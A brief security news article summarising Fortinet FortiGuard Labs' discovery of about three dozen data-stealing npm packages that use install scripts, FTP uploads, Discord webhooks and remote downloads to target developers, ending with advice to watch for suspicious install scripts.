Over 3 Dozen Data-Stealing Malicious npm Packages Found Targeting Developers
Numerous counterfeit packages, amounting to almost thirty-six, have been unearthed within the npm package repository. These deceptive packages are devised to stealthily extract sensitive data from developers’ systems, as disclosed by the Fortinet FortiGuard Labs research findings.
In addition, the cybersecurity firm uncovered another set of four modules, namely binarium-crm, career-service-client-0.1.6, hh-dep-monitoring, and orbitplate. These modules are responsible for the unauthorized retrieval of source code and configuration files. These targeted files and directories might contain highly valuable intellectual property and sensitive information, including various application and service credentials. The stolen data is then packaged into archives and uploaded to an FTP server.
Furthermore, some of these malicious packages have been observed using a Discord webhook for the exfiltration of sensitive data, while a few others are engineered to automatically download and execute potentially malicious executable files from external URLs.
In an unusual twist, a rogue package by the name of @cima/prism-utils employed an install script to disable TLS certificate validation, setting NODE_TLS_REJECT_UNAUTHORIZED=0. This action potentially exposes connections to vulnerabilities like man-in-the-middle (MitM) attacks.
The cybersecurity company has categorized the identified modules into nine different groups based on code similarities and functions. A majority of these packages utilize install scripts that execute pre or post-install actions to carry out data harvesting.
The researchers have advised end users to remain vigilant for packages employing suspicious install scripts and to exercise caution when dealing with such packages.